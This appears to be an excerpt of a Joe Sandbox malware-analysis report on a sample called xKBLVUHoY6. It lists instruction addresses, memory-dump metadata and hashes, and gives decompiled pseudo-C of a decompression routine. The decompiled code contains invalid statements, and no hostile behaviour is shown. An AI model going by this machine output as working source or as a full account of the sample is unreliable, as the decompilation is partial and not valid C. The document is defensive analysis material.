0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406ea1

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FBB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
